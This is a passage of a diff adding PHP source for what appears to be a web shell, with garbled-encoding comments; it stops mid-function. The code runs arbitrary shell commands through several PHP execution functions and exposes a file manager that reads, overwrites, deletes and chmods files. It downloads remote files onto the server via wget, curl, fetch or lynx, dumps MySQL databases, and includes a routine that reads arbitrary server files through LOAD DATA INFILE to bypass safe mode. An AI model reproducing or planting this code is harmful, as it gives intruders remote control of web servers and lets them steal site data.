+PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
+0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
+A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
+$port[1] = "tcpmux (TCP Port Service Multiplexer)";
+$port[2] = "Management Utility";
+$port[3] = "Compression Process";
+$port[5] = "rje (Remote Job Entry)";
+$port[7] = "echo";
+$port[9] = "discard";
+$port[11] = "systat";
+$port[13] = "daytime";
+$port[15] = "netstat";
+$port[17] = "quote of the day";
+$port[18] = "send/rwp";
+$port[19] = "character generator";
+$port[20] = "ftp-data";
+$port[21] = "ftp";
+$port[22] = "ssh, pcAnywhere";
+$port[23] = "Telnet";
+$port[25] = "SMTP (Simple Mail Transfer)";
+$port[27] = "ETRN (NSW User System FE)";
+$port[29] = "MSG ICP";
+$port[31] = "MSG Authentication";
+$port[33] = "dsp (Display Support Protocol)";
+$port[37] = "time";
+$port[38] = "RAP (Route Access Protocol)";
+$port[39] = "rlp (Resource Location Protocol)";
+$port[41] = "Graphics";
+$port[42] = "nameserv, WINS";
+$port[43] = "whois, nickname";
+$port[44] = "MPM FLAGS Protocol";
+$port[45] = "Message Processing Module [recv]";
+$port[46] = "MPM [default send]";
+$port[47] = "NI FTP";
+$port[48] = "Digital Audit Daemon";
+$port[49] = "TACACS, Login Host Protocol";
+$port[50] = "RMCP, re-mail-ck";
+$port[53] = "DNS";
+$port[57] = "MTP (any private terminal access)";
+$port[59] = "NFILE";
+$port[60] = "Unassigned";
+$port[61] = "NI MAIL";
+$port[62] = "ACA Services";
+$port[63] = "whois++";
+$port[64] = "Communications Integrator (CI)";
+$port[65] = "TACACS-Database Service";
+$port[66] = "Oracle SQL*NET";
+$port[67] = "bootps (Bootstrap Protocol Server)";
+$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
+$port[69] = "Trivial File Transfer Protocol (tftp)";
+$port[70] = "Gopher";
+$port[71] = "Remote Job Service";
+$port[72] = "Remote Job Service";
+$port[73] = "Remote Job Service";
+$port[74] = "Remote Job Service";
+$port[75] = "any private dial out service";
+$port[76] = "Distributed External Object Store";
+$port[77] = "any private RJE service";
+$port[78] = "vettcp";
+$port[79] = "finger";
+$port[80] = "World Wide Web HTTP";
+$port[81] = "HOSTS2 Name Serve";
+$port[82] = "XFER Utility";
+$port[83] = "MIT ML Device";
+$port[84] = "Common Trace Facility";
+$port[85] = "MIT ML Device";
+$port[86] = "Micro Focus Cobol";
+$port[87] = "any private terminal link";
+$port[88] = "Kerberos, WWW";
+$port[89] = "SU/MIT Telnet Gateway";
+$port[90] = "DNSIX Securit Attribute Token Map";
+$port[91] = "MIT Dover Spooler";
+$port[92] = "Network Printing Protocol";
+$port[93] = "Device Control Protocol";
+$port[94] = "Tivoli Object Dispatcher";
+$port[95] = "supdup";
+$port[96] = "DIXIE";
+$port[98] = "linuxconf";
+$port[99] = "Metagram Relay";
+$port[100] = "[unauthorized use]";
+$port[101] = "HOSTNAME";
+$port[102] = "ISO, X.400, ITOT";
+$port[103] = "Genesis Point-to-Point";
+$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
+$port[105] = "CCSO name server protocol";
+$port[106] = "poppassd";
+$port[107] = "Remote Telnet Service";
+$port[108] = "SNA Gateway Access Server";
+$port[109] = "POP2";
+$port[110] = "POP3";
+$port[111] = "Sun RPC Portmapper";
+$port[112] = "McIDAS Data Transmission Protocol";
+$port[113] = "Authentication Service";
+$port[115] = "sftp (Simple File Transfer Protocol)";
+$port[116] = "ANSA REX Notify";
+$port[117] = "UUCP Path Service";
+$port[118] = "SQL Services";
+$port[119] = "NNTP";
+$port[120] = "CFDP";
+$port[123] = "NTP";
+$port[124] = "SecureID";
+$port[129] = "PWDGEN";
+$port[133] = "statsrv";
+$port[135] = "loc-srv/epmap";
+$port[137] = "netbios-ns";
+$port[138] = "netbios-dgm (UDP)";
+$port[139] = "NetBIOS";
+$port[143] = "IMAP";
+$port[144] = "NewS";
+$port[150] = "SQL-NET";
+$port[152] = "BFTP";
+$port[153] = "SGMP";
+$port[156] = "SQL Service";
+$port[161] = "SNMP";
+$port[175] = "vmnet";
+$port[177] = "XDMCP";
+$port[178] = "NextStep Window Server";
+$port[179] = "BGP";
+$port[180] = "SLmail admin";
+$port[199] = "smux";
+$port[210] = "Z39.50";
+$port[213] = "IPX";
+$port[218] = "MPP";
+$port[220] = "IMAP3";
+$port[256] = "RAP";
+$port[257] = "Secure Electronic Transaction";
+$port[258] = "Yak Winsock Personal Chat";
+$port[259] = "ESRO";
+$port[264] = "FW1_topo";
+$port[311] = "Apple WebAdmin";
+$port[350] = "MATIP type A";
+$port[351] = "MATIP type B";
+$port[363] = "RSVP tunnel";
+$port[366] = "ODMR (On-Demand Mail Relay)";
+$port[371] = "Clearcase";
+$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
+$port[389] = "LDAP";
+$port[407] = "Timbuktu";
+$port[427] = "Server Location";
+$port[434] = "Mobile IP";
+$port[443] = "ssl";
+$port[444] = "snpp, Simple Network Paging Protocol";
+$port[445] = "SMB";
+$port[458] = "QuickTime TV/Conferencing";
+$port[468] = "Photuris";
+$port[475] = "tcpnethaspsrv";
+$port[500] = "ISAKMP, pluto";
+$port[511] = "mynet-as";
+$port[512] = "biff, rexec";
+$port[513] = "who, rlogin";
+$port[514] = "syslog, rsh";
+$port[515] = "lp, lpr, line printer";
+$port[517] = "talk";
+$port[520] = "RIP (Routing Information Protocol)";
+$port[521] = "RIPng";
+$port[522] = "ULS";
+$port[531] = "IRC";
+$port[543] = "KLogin, AppleShare over IP";
+$port[545] = "QuickTime";
+$port[548] = "AFP";
+$port[554] = "Real Time Streaming Protocol";
+$port[555] = "phAse Zero";
+$port[563] = "NNTP over SSL";
+$port[575] = "VEMMI";
+$port[581] = "Bundle Discovery Protocol";
+$port[593] = "MS-RPC";
+$port[608] = "SIFT/UFT";
+$port[626] = "Apple ASIA";
+$port[631] = "IPP (Internet Printing Protocol)";
+$port[635] = "RLZ DBase";
+$port[636] = "sldap";
+$port[642] = "EMSD";
+$port[648] = "RRP (NSI Registry Registrar Protocol)";
+$port[655] = "tinc";
+$port[660] = "Apple MacOS Server Admin";
+$port[666] = "Doom";
+$port[674] = "ACAP";
+$port[687] = "AppleShare IP Registry";
+$port[700] = "buddyphone";
+$port[705] = "AgentX for SNMP";
+$port[901] = "swat, realsecure";
+$port[993] = "s-imap";
+$port[995] = "s-pop";
+$port[1024] = "Reserved";
+$port[1025] = "network blackjack";
+$port[1062] = "Veracity";
+$port[1080] = "SOCKS";
+$port[1085] = "WebObjects";
+$port[1227] = "DNS2Go";
+$port[1243] = "SubSeven";
+$port[1338] = "Millennium Worm";
+$port[1352] = "Lotus Notes";
+$port[1381] = "Apple Network License Manager";
+$port[1417] = "Timbuktu Service 1 Port";
+$port[1418] = "Timbuktu Service 2 Port";
+$port[1419] = "Timbuktu Service 3 Port";
+$port[1420] = "Timbuktu Service 4 Port";
+$port[1433] = "Microsoft SQL Server";
+$port[1434] = "Microsoft SQL Monitor";
+$port[1477] = "ms-sna-server";
+$port[1478] = "ms-sna-base";
+$port[1490] = "insitu-conf";
+$port[1494] = "Citrix ICA Protocol";
+$port[1498] = "Watcom-SQL";
+$port[1500] = "VLSI License Manager";
+$port[1503] = "T.120";
+$port[1521] = "Oracle SQL";
+$port[1522] = "Ricardo North America License Manager";
+$port[1524] = "ingres";
+$port[1525] = "prospero";
+$port[1526] = "prospero";
+$port[1527] = "tlisrv";
+$port[1529] = "oracle";
+$port[1547] = "laplink";
+$port[1604] = "Citrix ICA, MS Terminal Server";
+$port[1645] = "RADIUS Authentication";
+$port[1646] = "RADIUS Accounting";
+$port[1680] = "Carbon Copy";
+$port[1701] = "L2TP/LSF";
+$port[1717] = "Convoy";
+$port[1720] = "H.323/Q.931";
+$port[1723] = "PPTP control port";
+$port[1731] = "MSICCP";
+$port[1755] = "Windows Media .asf";
+$port[1758] = "TFTP multicast";
+$port[1761] = "cft-0";
+$port[1762] = "cft-1";
+$port[1763] = "cft-2";
+$port[1764] = "cft-3";
+$port[1765] = "cft-4";
+$port[1766] = "cft-5";
+$port[1767] = "cft-6";
+$port[1808] = "Oracle-VP2";
+$port[1812] = "RADIUS server";
+$port[1813] = "RADIUS accounting";
+$port[1818] = "ETFTP";
+$port[1973] = "DLSw DCAP/DRAP";
+$port[1985] = "HSRP";
+$port[1999] = "Cisco AUTH";
+$port[2001] = "glimpse";
+$port[2049] = "NFS";
+$port[2064] = "distributed.net";
+$port[2065] = "DLSw";
+$port[2066] = "DLSw";
+$port[2106] = "MZAP";
+$port[2140] = "DeepThroat";
+$port[2301] = "Compaq Insight Management Web Agents";
+$port[2327] = "Netscape Conference";
+$port[2336] = "Apple UG Control";
+$port[2427] = "MGCP gateway";
+$port[2504] = "WLBS";
+$port[2535] = "MADCAP";
+$port[2543] = "sip";
+$port[2592] = "netrek";
+$port[2727] = "MGCP call agent";
+$port[2628] = "DICT";
+$port[2998] = "ISS Real Secure Console Service Port";
+$port[3000] = "Firstclass";
+$port[3001] = "Redwood Broker";
+$port[3031] = "Apple AgentVU";
+$port[3128] = "squid";
+$port[3130] = "ICP";
+$port[3150] = "DeepThroat";
+$port[3264] = "ccmail";
+$port[3283] = "Apple NetAssitant";
+$port[3288] = "COPS";
+$port[3305] = "ODETTE";
+$port[3306] = "mySQL";
+$port[3389] = "RDP Protocol (Terminal Server)";
+$port[3521] = "netrek";
+$port[4000] = "icq, command-n-conquer and shell nfm";
+$port[4321] = "rwhois";
+$port[4333] = "mSQL";
+$port[4444] = "KRB524";
+$port[4827] = "HTCP";
+$port[5002] = "radio free ethernet";
+$port[5004] = "RTP";
+$port[5005] = "RTP";
+$port[5010] = "Yahoo! Messenger";
+$port[5050] = "multimedia conference control tool";
+$port[5060] = "SIP";
+$port[5150] = "Ascend Tunnel Management Protocol";
+$port[5190] = "AIM";
+$port[5500] = "securid";
+$port[5501] = "securidprop";
+$port[5423] = "Apple VirtualUser";
+$port[5555] = "Personal Agent";
+$port[5631] = "PCAnywhere data";
+$port[5632] = "PCAnywhere";
+$port[5678] = "Remote Replication Agent Connection";
+$port[5800] = "VNC";
+$port[5801] = "VNC";
+$port[5900] = "VNC";
+$port[5901] = "VNC";
+$port[6000] = "X Windows";
+$port[6112] = "BattleNet";
+$port[6502] = "Netscape Conference";
+$port[6667] = "IRC";
+$port[6670] = "VocalTec Internet Phone, DeepThroat";
+$port[6699] = "napster";
+$port[6776] = "Sub7";
+$port[6970] = "RTP";
+$port[7007] = "MSBD, Windows Media encoder";
+$port[7070] = "RealServer/QuickTime";
+$port[7777] = "cbt";
+$port[7778] = "Unreal";
+$port[7648] = "CU-SeeMe";
+$port[7649] = "CU-SeeMe";
+$port[8000] = "iRDMI/Shoutcast Server";
+$port[8010] = "WinGate 2.1";
+$port[8080] = "HTTP";
+$port[8181] = "HTTP";
+$port[8383] = "IMail WWW";
+$port[8875] = "napster";
+$port[8888] = "napster";
+$port[8889] = "Desktop Data TCP 1";
+$port[8890] = "Desktop Data TCP 2";
+$port[8891] = "Desktop Data TCP 3: NESS application";
+$port[8892] = "Desktop Data TCP 4: FARM product";
+$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
+$port[8894] = "Desktop Data TCP 6: COAL application";
+$port[9000] = "CSlistener";
+$port[10008] = "cheese worm";
+$port[11371] = "PGP 5 Keyserver";
+$port[13223] = "PowWow";
+$port[13224] = "PowWow";
+$port[14237] = "Palm";
+$port[14238] = "Palm";
+$port[18888] = "LiquidAudio";
+$port[21157] = "Activision";
+$port[22555] = "Vocaltec Web Conference";
+$port[23213] = "PowWow";
+$port[23214] = "PowWow";
+$port[23456] = "EvilFTP";
+$port[26000] = "Quake";
+$port[27001] = "QuakeWorld";
+$port[27010] = "Half-Life";
+$port[27015] = "Half-Life";
+$port[27960] = "QuakeIII";
+$port[30029] = "AOL Admin";
+$port[31337] = "Back Orifice";
+$port[32777] = "rpc.walld";
+$port[45000] = "Cisco NetRanger postofficed";
+$port[32773] = "rpc bserverd";
+$port[32776] = "rpc.spray";
+$port[32779] = "rpc.cmsd";
+$port[38036] = "timestep";
+$port[40193] = "Novell";
+$port[41524] = "arcserve discovery";
+////////////////////////////////////////////////////////////////////////////////
+////////////////////////////////�������/////////////////////////////////////////
+///////////////////////////////////////////////////////////////////////////////
+function rep_char($ch,$count)                  //���������� �������
+{
+ $res="";
+ for($i=0; $i<=$count; ++$i){
+  $res.=$ch."";
+ }
+ return $res;
+}
+function ex($comd)                             //���������� �������
+{
+ $res = '';
+ if (!empty($comd)){
+  if(function_exists('exec')){
+    exec($comd,$res);
+    $res=implode("\n",$res);
+   }elseif(function_exists('shell_exec')){
+    $res=shell_exec($comd);
+   }elseif(function_exists('system')){
+    ob_start();
+    system($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(function_exists('passthru')){
+    ob_start();
+    passthru($comd);
+    $res=ob_get_contents();
+    ob_end_clean();
+   }elseif(is_resource($f=popen($comd,"r"))){
+    $res = "";
+    while(!feof($f)) { $res.=fread($f,1024); }
+    pclose($f);
+  }
+ }
+ return $res;
+}
+function sysinfo()                             //����� SYSINFO
+{
+ global $curl_on, $dis_func, $mysql_stat, $safe_mode, $server, $HTTP_SERVER_VARS;
+ echo("<b><font  face=Verdana size=2> System information:<br><font size=-2>
+      <hr>");
+ echo (($safe_mode)?("Safe Mode: </b><font color=green>ON</font><b> "):
+         ("Safe Mode: </b><font color=red>OFF</font><b> "));
+ $row_dis_func=explode(', ',$dis_func);
+ echo ("PHP: </b><font color=blue>".phpversion()."</font><b> ");
+ echo ("MySQL: </b>");
+ if($mysql_stat){
+  echo "<font color=green>ON </font><b>";
+ }
+ else {
+  echo "<font color=red>OFF </font><b>";
+ }
+ echo "cURL: </b>";
+ if($curl_on){
+  echo "<font color=green>ON</font><b><br>";
+ }else
+  echo "<font color=red>OFF</font><b><br>";
+ if ($dis_func!=""){
+  echo "Disabled Functions: </b><font color=red>".$dis_func."</font><br><b>";
+ }
+ $uname=ex('uname -a');
+ echo "OS: </b><font color=blue>";
+ if (empty($uname)){
+  echo (php_uname()."</font><br><b>");
+ }else
+  echo $uname."</font><br><b>";
+ $id = ex('id');
+ echo "SERVER: </b><font color=blue>".$server."</font><br><b>";
+ echo "id: </b><font color=blue>";
+ if (!empty($id)){
+  echo $id."</font><br><b>";
+ }else
+  echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid().
+       "</font><br><b>";
+ echo "<b>RemoteAddress:</b><font color=red>".$HTTP_SERVER_VARS['REMOTE_ADDR']."</font><br>";
+ if(isset($HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR'])){
+  echo "<b>RemoteAddressIfProxy:</b><font color=red>".$HTTP_SERVER_VARS['HTTP_X_FORWARDED_FOR']."</font>";
+ }
+ echo "<hr size=3 color=black>";
+ echo "</font></font>";
+}
+function read_dir($dir)                 //������ �����
+{
+ $d=opendir($dir);
+ $i=0;
+ while($r=readdir($d)){
+  $res[$i]=$r;
+  $i++;
+ }
+ return $res;
+}
+function permissions($mode,$file) {            //����������� �������
+ $type=filetype($file);
+ $perms=$type[0];
+ $perms.=($mode & 00400) ? "r" : "-";
+ $perms.=($mode & 00200) ? "w" : "-";
+ $perms.=($mode & 00100) ? "x" : "-";
+ $perms.=($mode & 00040) ? "r" : "-";
+ $perms.=($mode & 00020) ? "w" : "-";
+ $perms.=($mode & 00010) ? "x" : "-";
+ $perms.=($mode & 00004) ? "r" : "-";
+ $perms.=($mode & 00002) ? "w" : "-";
+ $perms.=($mode & 00001) ? "x" : "-";
+ $perms.="(".$mode.")";
+ return $perms;
+}
+function open_file($fil, $m, $d)                          //������� ����
+{
+ if (!($fp=fopen($fil,$m))) {
+  $res="Error opening file!\n";
+ }else{
+  ob_start();
+  readfile($fil);
+  $res=ob_get_contents();
+  ob_end_clean();
+  if (!(fclose($fp))){
+   $res="ERROR CLOSE";
+  }
+ }
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr><td alling=center><b>&nbsp;&nbsp;&nbsp;".$fil."&nbsp;&nbsp;&nbsp;</b></td></tr>";
+ echo "<tr><td alling=center><textarea name=\"text\" cols=90 rows=15>";
+ echo $res;
+ echo "</textarea></td></tr>";
+ if(is_writable($fil)){
+  echo "<input type=\"hidden\" value='".$fil."' name=\"fname\">";
+  echo "<input type=\"hidden\" value='".$d."' name=\"dname\">";
+  echo "<tr><td alling=center><input style='width:100px;' type=\"submit\" value=\"Save\" name=\"b_save\"></td></tr>";
+ }
+ echo "</form></table>";
+}
+function save_file($res,$fil, $d)                     //��������� ����
+{
+ unlink($fil);
+ $fp=fopen($fil,"wb");
+ if(!$fp){
+  $res="Error create file!\n".$fp;
+ }else{
+  if (fwrite($fp,$res)){
+   if (fclose($fp)){
+    $res="File save succesfuly!\n";
+   }else $res="Erorr close!\n";
+  }else $res="Error wright!\n";
+ }
+ umask(0000);
+ chmod($fil,0777);
+ return $res;
+}
+function strmass($mass){
+ $res="";
+ foreach($mass as $k=>$v){
+  $res.=$v."|";
+ }
+ return $res;
+}
+function sortbyname($fnames, $d)
+{
+ $filenames="";
+ $foldernames="";
+ $numnames=count($fnames);
+ for($i=0;$i<=$numnames;$i++){
+  if(is_dir($d."/".$fnames[$i])){
+   $foldernames.=$fnames[$i]."|";
+  }else
+   $filenames.=$fnames[$i]."|";
+ }
+ $mass1=explode("|",$foldernames);
+ $mass2=explode("|",$filenames);
+ sort($mass1);
+ sort($mass2);
+ $mass1=strmass($mass1);
+ $mass2=strmass($mass2);
+ $mass=explode("|",$mass1.$mass2);
+ return $mass;
+}
+function list_dir($d)                     //���������
+{
+ global $HTTP_REFERER;
+ if(isset($_POST['b_up']) OR isset($_POST['b_open_dir'])){
+  chdir($_POST['fname']);
+  $d=getcwd();
+ }else
+  $d=getcwd();
+ if($_POST['b_new_dir']){
+  mkdir($_POST['new']);
+  chmod($_POST['new'],0777);
+  $d=$_POST['new'];
+ }
+ if($_POST['b_del'] AND is_dir($_POST['fname'])){
+  rmdir($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_del'] AND !is_dir($_POST['fname'])){
+  unlink($_POST['fname']);
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ if($_POST['b_change_dir']){
+  chdir($_POST['change_dir']);
+  $d=getcwd();
+ }
+ if($_POST['b_new_file'] OR $_POST['b_open_file']){
+  chdir($_POST['dname']);
+  $d=getcwd();
+ }
+ $dir=read_dir($d);
+ $dir=sortbyname($dir,$d);
+ $count=count($dir);
+ echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+ echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\">";
+ echo "<table BORDER=1 align=center>";
+ echo "<tr bgcolor=#ffff00><td alling=\"center\"><b>Navigation</b></td></tr>";
+ if(is_writable($d)){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"new\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewDir\" name=\"b_new_dir\"></td>";
+  echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"NewFile\" name=\"b_new_file\"></td></tr>";
+ }
+ echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"$d\" name=\"change_dir\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"ChangeDir\" name=\"b_change_dir\"></td></tr>";
+ if(!$safe_mode){
+  echo "<tr><td alling=\"center\"><input style='width:200px;' type=\"text\" value=\"\" name=\"ffile\"></td><td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"FindeFile\" name=\"b_f_file\"></td></tr>";
+ }
+ echo "</table></form>";
+ echo "<table CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>";
+ echo "<tr bgcolor=#ffff00><td><b>&nbsp;&nbsp;&nbsp;Directory&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Permission&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Size&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Owner/Group&nbsp;&nbsp;&nbsp;</b></td><td alling=\"center\"><b>&nbsp;&nbsp;&nbsp;Action&nbsp;&nbsp;&nbsp;</b></td>";
+ for($i=0; $i<$count; $i++){
+  if($dir[$i]!=""){
+   $full=$d."/".$dir[$i];
+   $perm=permissions(fileperms($full),$dir[$i]);
+   $file=$d."/".$dir[$i];
+   echo "<form action=\"".$HTTP_REFERER."\" method=\"POST\" enctype=\"multipart/form-data\">";
+   if(is_dir($file)){
+    echo "<tr bgcolor=#98FA00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+          "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }elseif(is_file($file)){
+    echo "<tr><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   }else
+     echo "<tr bgcolor=#ffff00><td>".$dir[$i]."&nbsp;&nbsp;&nbsp;</td><input type=\"hidden\" value='".$d."' name=\"dname\"><input type=\"hidden\" value='".$file."' name=\"fname\"><td alling=\"center\">".$perm.
+         "&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">".filesize($dir[$i])."&nbsp;&nbsp;&nbsp;</td><td alling=\"center\">&nbsp;&nbsp;&nbsp;".fileowner($dir[$i])."&nbsp;&nbsp;&nbsp;".filegroup($dir[$i])."&nbsp;&nbsp;&nbsp;</td>";
+   if(is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Listing\" name=\"b_open_dir\"></td>";
+   }elseif(is_readable($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Open\" name=\"b_open_file\"></td>";
+   }
+   if(is_writable($file) AND $file!=".."){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Delete\" name=\"b_del\"></td>";
+   }
+   if(is_readable($file) AND !is_dir($file)){
+    echo "<td alling=\"center\"><input style='width:100px;' type=\"submit\" value=\"Download\" name=\"b_down\"></td>";
+   }
+   echo "<input type=\"hidden\" value='".$r_act."' name=\"r_act\"></tr>";
+   echo "</form>";
+  }
+ }
+ echo "</table>";
+ closedir($d);
+}
+function up_file($fil,$tfil, $box)                   //�������� ������ �� ������
+{
+ global $_FILES;
+ if ($tfil==""){
+  $res="Target is failde!";
+ }
+ if ($box=="PC"){
+  if(copy($_FILES["filename"]["tmp_name"],$tfil)){
+   chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  }else {
+    $res="Error loading file!";
+  }
+ }
+ if($box=="WGET") {
+  $load="wget ".$fil." -O ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="FETCH"){
+  $load="fetch -o ".$tfil." -p ".$fil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="LYNX"){
+  $load="lynx -source ".$fil." > ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="cURL"){
+  $load="curl"." ".$fil." -o ".$tfil."";
+  $res=ex($load);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+  chmod($tfil,0777);
+ }
+ if($box=="fopen"){
+  $data=implode("", file($fil));
+  $fp=fopen($tfil, "wb");
+  fputs($fp,$data);
+  fclose($fp);
+  chmod($tfil,0777);
+   if(file_exists($tfil)){
+    $res="Ok";
+   }else
+    $res="False";
+ }
+ return $res;
+}
+function run_sql($comd, $db,$host, $username, $pass)   //��������� SQL �������
+{
+ if ($comd!=""){
+  if ($db!=""){
+   $connect=mysql_connect($host, $username, $pass);
+   if (!$connect) {
+    $res='Could not connect to MySQL';
+   }
+   mysql_select_db ($db);
+   $row=mysql_query($comd);
+   while ($r= mysql_fetch_row($row)) {
+    $res.="&nbsp;".implode($r);
+   }
+   $result=$res;
+   mysql_free_result($row);
+   mysql_free_result($r);
+   mysql_close($connect);
+  }else $result="Select data base!";
+ }else $result="No command!";
+ return $result;
+}
+function db_show($host, $username, $pass)             //����� ��������� ��
+{
+ $res="Exists BD: \n";
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect){
+  $res="Could not connect to MySQL!\n".mysql_error();
+ }else{
+  $db_list=mysql_list_dbs($connect);
+  while ($row = mysql_fetch_object($db_list)) {
+   $res.=$row->Database . "\n";
+  }
+  mysql_close($connect);
+ }
+ return $res;
+}
+function show_tables($bd, $host, $username, $pass)   //����� ��������� ������
+{
+ if ($bd!=""){
+  $res="Exists tables: \n";
+  $connect=mysql_connect($host, $username, $pass);
+  if (!$connect){
+   $res="Could not connect to MySQL\n".mysql_error();
+  }else{
+   $r=mysql_query("SHOW TABLES FROM $bd");
+   $res="Exist tables:\n";
+   while ($row=mysql_fetch_row($r)) {
+    $res.="Table: $row[0]\n";
+    $fields=mysql_list_fields($bd, $row[0], $connect);
+    $columns=mysql_num_fields($fields);
+    $res.="| ";
+    for ($i=0; $i<$columns; $i++) {
+     $res.=mysql_field_name($fields, $i)." | ";
+    }
+    $res.="\n____________________________\n";
+   }
+   mysql_free_result($r);
+   mysql_close($connect);
+  }
+ }else
+  $res="Select data base! ";
+ return $res;
+}
+function dump_table($tab, $db,$host, $username, $pass)  //���� �������
+{
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  $result="Could not connect to MySQL!\n".mysql_error();
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    $result="Could not connect to db!\n".mysql_error();
+   }else{
+    if ($db==""){
+     $result="Select data base!";
+    }else{
+     $res1="# MySQL dump of $tab\r\n";
+     $r=mysql_query("SHOW CREATE TABLE `".$tab."`", $connect);
+     $row=mysql_fetch_row($r);
+     $res1.=$row[1]."\r\n\r\n";
+     $res1.= "# ---------------------------------\r\n\r\n";
+     $res2 = '';
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       $keys=implode("`, `", array_keys($row));
+       $values=array_values($row);
+       foreach($values as $k=>$v){
+        $values[$k]=addslashes($v);
+       }
+       $values=implode("', '", $values);
+       $res2.="INSERT INTO `".$tab."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n";
+      }
+      $res2.="\r\n# ---------------------------------";
+     }
+     $result=$res1.$res2;
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $result;
+}
+function down_tb($tab, $db,$host, $username, $pass){
+ $connect=mysql_connect($host, $username, $pass);
+ if (!$connect) {
+  die("Could not connect to MySQL!\n".mysql_error());
+ }else{
+   if (!mysql_select_db($db,$connect)){
+    die("Could not connect to db!\n".mysql_error());
+   }else{
+    if ($db==""){
+     die("Select data base!");
+    }else{
+     $res1="";
+     $r=mysql_query("SELECT * FROM `".$tab."`", $connect);
+     if (mysql_num_rows($r)>0){
+      while (($row=mysql_fetch_assoc($r))){
+       foreach($row as $k=>$v){
+        $res1.=$v."\t";
+       }
+       $res1.="\n";
+      }
+     }
+     mysql_close($db);
+    }
+   }
+ }
+
+ return $res1;
+}
+function safe_mode_fuck($fil,$host, $username, $pass, $dbname)//����� ����������� ������
+{
+ $connect=mysql_connect($host,$username,$pass);
+ if($connect){
+  if(mysql_select_db($dbname,$connect)){
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   $c="CREATE TABLE `temp_gfs_table` ( `file` LONGBLOB NOT NULL );";
+   mysql_query($c);
+   $c="LOAD DATA INFILE \"".$fil."\" INTO TABLE temp_gfs_table;";
+   mysql_query($c);
+   $c="SELECT * FROM temp_gfs_table;";
+   $r=mysql_query($c);
+   while(($row=mysql_fetch_array($r))){
+    $res.=htmlspecialchars($row[0]);
+   }
+   $c="DROP TABLE IF EXISTS temp_gfs_table;";
+   mysql_query($c);
+   }else
